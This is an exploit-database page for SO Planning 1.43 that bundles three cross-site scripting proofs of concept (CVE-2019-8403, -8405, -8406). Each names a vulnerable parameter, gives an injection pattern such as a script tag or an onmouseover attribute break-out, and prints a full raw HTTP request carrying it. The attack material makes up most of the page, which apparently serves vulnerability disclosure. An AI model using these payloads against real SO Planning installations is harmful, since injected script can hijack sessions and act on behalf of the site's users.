SO Planning 1.43 - Multiple XSS Injection

2019.04.15
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=========================================================================================== # Exploit Title: SO Planning 1.43 - 'PROJECT_COLORS_POSSIBLE' XSS Injection # CVE: CVE-2019-8406 # Date: 17-02-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://www.soplanning.org/en/ # Software Link: https://sourceforge.net/projects/soplanning/ # Version: v1.43 # Category: Webapps # Tested on: Wamp64, @Win # Software description:SO Planning is a Simple Online Planning tool. Allows you to plan working periods for each person of your team, in a visual / printable result. =========================================================================================== # POC - XSS # Parameters : PROJECT_COLORS_POSSIBLE # Attack Pattern : e'"()&%<acx><ScRiPt >alert(9871)</ScRiPt> # POST Request : http://localhost/soplanning/www/process/options.php =========================================================================================== GET /soplanning/www/options.php HTTP/1.1 Referer: http://localhost/soplanning/ Cookie: sloapplanning_=28973u450s43jhtt88s8e2molo; baseLigne=users; baseColonne=jours; dimensionCase=reduit; date_debut_affiche=09%2F02%2F2019; date_fin_affiche=08%2F05%2F2019; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22e%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22f%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%5D; dateDebut=16/02/2019; dateFin=16/04/2019; xposJoursWin=0; xposJours=0; xposMois=0; yposMois=0; xposMoisWin=0; pdf_orientation=portrait; pdf_format=A0; date_debut_affiche_tache=e; date_fin_affiche_tache=e Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* Host: localhost ########################################################################################### =========================================================================================== # Exploit Title: SO Planning 1.43 - 'xajax' XSS Injection # CVE: CVE-2019-8405 # Date: 17-02-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://www.soplanning.org/en/ # Software Link: https://sourceforge.net/projects/soplanning/ # Version: v1.43 # Category: Webapps # Tested on: Wamp64, @Win # Software description:SO Planning is a Simple Online Planning tool. Allows you to plan working periods for each person of your team, in a visual / printable result. =========================================================================================== # POC - XSS # Parameters : xajax # Attack Pattern : submitFormProjet'"()&%<acx><ScRiPt >lWct(9209)</ScRiPt> # POST Request : http://localhost/soplanning/www/process/xajax_server.php =========================================================================================== POST /soplanning/www/process/xajax_server.php HTTP/1.1 Content-Length: 334 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/soplanning/ Cookie: sloapplanning_=28973u450s43jhtt88s8e2molo; baseLigne=users; baseColonne=jours; dimensionCase=reduit; date_debut_affiche=09%2F02%2F2019; date_fin_affiche=08%2F05%2F2019; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22e%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22f%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%5D; dateDebut=16/02/2019; dateFin=16/04/2019; xposJoursWin=0; xposJours=0; xposMois=0; yposMois=0; xposMoisWin=0; pdf_orientation=portrait; pdf_format=A0; date_debut_affiche_tache=e; date_fin_affiche_tache=e Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* xajax=submitFormProjet'"()%26%25<acx><ScRiPt%20>lWct(9209)</ScRiPt>&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=&xajaxr=1550350032415 ########################################################################################### =========================================================================================== # Exploit Title: SO Planning 1.43 - 'graphe_width' XSS Injection # CVE: CVE-2019-8403 # Date: 17-02-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://www.soplanning.org/en/ # Software Link: https://sourceforge.net/projects/soplanning/ # Version: v1.43 # Category: Webapps # Tested on: Wamp64, @Win # Software description:SO Planning is a Simple Online Planning tool. Allows you to plan working periods for each person of your team, in a visual / printable result. =========================================================================================== # POC - XSS # Parameters : graphe_width,graphe_height,ordonnee_max,ordonnee_min # Attack Pattern : 500"onmouseover=jfQ2(9564)" # POST Request : http://localhost/soplanning/www/stats_users.php =========================================================================================== POST /soplanning/www/stats_users.php HTTP/1.1 Content-Length: 245 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/soplanning/ Cookie: sloapplanning_=28973u450s43jhtt88s8e2molo; baseLigne=users; baseColonne=jours; dimensionCase=reduit; date_debut_affiche=09%2F02%2F2019; date_fin_affiche=08%2F05%2F2019; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22e%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22f%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%5D; dateDebut=16/02/2019; dateFin=16/04/2019; xposJoursWin=0; xposJours=0; xposMois=0; yposMois=0; xposMoisWin=0; pdf_orientation=portrait; pdf_format=A0; date_debut_affiche_tache=e; date_fin_affiche_tache=e Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* abscisse_echelle=jour&abscisse_echelle_valeur=heures&date_debut=16/02/2019&date_fin=16/03/2019&graphe_height=500"onmouseover=jfQ2(9564)"&graphe_width=1100&grille=grille_h&ordonnee_max=1&ordonnee_min=1&projets=1&projet_id=test&users=1&user_id=ADM


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top